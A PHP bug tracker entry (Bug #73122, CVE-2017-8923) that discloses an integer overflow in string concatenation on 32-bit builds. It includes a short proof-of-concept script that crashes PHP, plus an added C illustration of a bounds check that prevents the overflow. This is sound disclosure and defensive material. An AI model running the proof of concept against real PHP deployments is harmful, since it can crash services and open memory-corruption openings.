Bug #73122 Integer Overflow when concatenating strings
Submitted: 2016-09-20 10:06 UTC Modified: 2017-11-13 09:53 UTC
Avg. Score: 3.0 ± 1.6
Reproduced: 1 of 2 (50.0%)
Same Version: 0 (0.0%)
Same OS: 0 (0.0%)
From: tloi at fortinet dot com Assigned:
Status: Open Package: Strings related
PHP Version: master-Git-2016-09-20 (Git) OS:
Private report: No CVE-ID: 2017-8923

 [2016-09-20 10:06 UTC] tloi at fortinet dot com
Recently I noticed that PHP has been patched several times to prevent generating negative-length strings, to mitigate security issues. But the concat operation can still be used to overflow the length of a string.

PoC ran on the 32-bit version.

This can be patched by checking len in either:

ZEND_CONCAT_*() functions in Zend_vm_execute.h
zend_string_extend() function in Zend_string.h

Test script:
<?php
// Lift the memory limit so the ~2 GiB string can actually be built.
ini_set('memory_limit', -1);
// 0x7fffffff bytes plus two more: on a 32-bit build the resulting
// length no longer fits in a non-negative zend_long.
$a = str_repeat('a', 0x7fffffff) . "aa";
print strlen($a);

Expected result:
zend_throw_error(NULL, "String size overflow");

Actual result:
➜  bin ./php -v
PHP 7.2.0-dev (cli) (built: Sep 20 2016 16:41:04) ( NTS DEBUG )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies
➜  bin ./php poc.php

on another machine with php from ubuntu's official repository:
root@ubuntu-4gb-sgp1-01:~# php -v
PHP 7.0.8-0ubuntu0.16.04.2 (cli) ( NTS )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2016 Zend Technologies
    with Zend OPcache v7.0.8-0ubuntu0.16.04.2, Copyright (c) 1999-2016, by Zend Technologies
root@ubuntu-4gb-sgp1-01:~# php poc.php

mmap() failed: [12] Cannot allocate memory
[1]    16589 segmentation fault (core dumped)  php poc.php
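The defensive check the report asks for, as an added illustration that is not the reporter's code and not PHP's own implementation: a concat must bound the new length before it adds the two operand lengths, because the sum can wrap past what the allocator or a signed length type can represent. The model below is constructed for this example; `MODEL_LONG_MAX_32`, `concat_len_checked` and `unchecked_len32` are hypothetical names, and the 0x7fffffff limit stands in for the largest non-negative 32-bit signed length. The real engine additionally reserves header bytes in each allocation, so its true bound is somewhat lower than the raw type limit.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Largest non-negative value of a 32-bit signed length (constructed for
 * this example; stands in for the 32-bit build's signed length limit). */
#define MODEL_LONG_MAX_32 0x7fffffffUL

/* Checked length addition for a concat.
 * Returns true and stores len1 + len2 in *out when the sum stays within
 * max_len; returns false otherwise. The subtraction form never computes
 * the sum before it is known to fit, so it cannot wrap even when both
 * operands are close to the limit. */
static bool concat_len_checked(size_t len1, size_t len2, size_t max_len,
                               size_t *out)
{
    if (len1 > max_len || len2 > max_len - len1) {
        return false;            /* caller should raise "String size overflow" */
    }
    *out = len1 + len2;
    return true;
}

/* Convenience wrapper: the checked sum, or 0 when the concat is refused. */
size_t concat_len_or_zero(size_t len1, size_t len2, size_t max_len)
{
    size_t out = 0;
    return concat_len_checked(len1, len2, max_len, &out) ? out : 0;
}

/* The unchecked form on a 32-bit build: the addition wraps modulo 2^32,
 * and a signed length type then sees the result as negative. */
int32_t unchecked_len32(uint32_t len1, uint32_t len2)
{
    uint32_t wrapped = len1 + len2;   /* modular arithmetic, no error */
    return (int32_t)wrapped;          /* what a signed length field holds */
}

/* Models the report's PoC, str_repeat('a', 0x7fffffff) . "aa", under the
 * 32-bit limit. Returns 1 when the checked concat correctly refuses it. */
int poc_rejected_on_32bit(void)
{
    size_t out;
    return !concat_len_checked(0x7fffffffUL, 2, MODEL_LONG_MAX_32, &out);
}

int main(void)
{
    printf("unchecked 0x7fffffff + 2 as signed 32-bit: %d\n",
           (int)unchecked_len32(0x7fffffffU, 2));
    printf("checked concat refused: %s\n",
           poc_rejected_on_32bit() ? "yes" : "no");
    printf("checked 10 + 20: %zu\n",
           concat_len_or_zero(10, 20, MODEL_LONG_MAX_32));
    return 0;
}
```

The check belongs at the point where the engine decides the new length, before any allocation or extension is attempted; refusing there turns the crash in the report into a clean "String size overflow" error.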


 [2016-09-20 16:26 UTC]
-Type: Security +Type: Bug
 [2017-11-13 09:53 UTC]
-CVE-ID: +CVE-ID: 2017-8923
 [2018-03-02 18:52 UTC] contacto at agora-security dot com
Has this issue been fixed?
I don't see any reference about it in the Changelog:
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Sat Jun 12 18:01:23 2021 UTC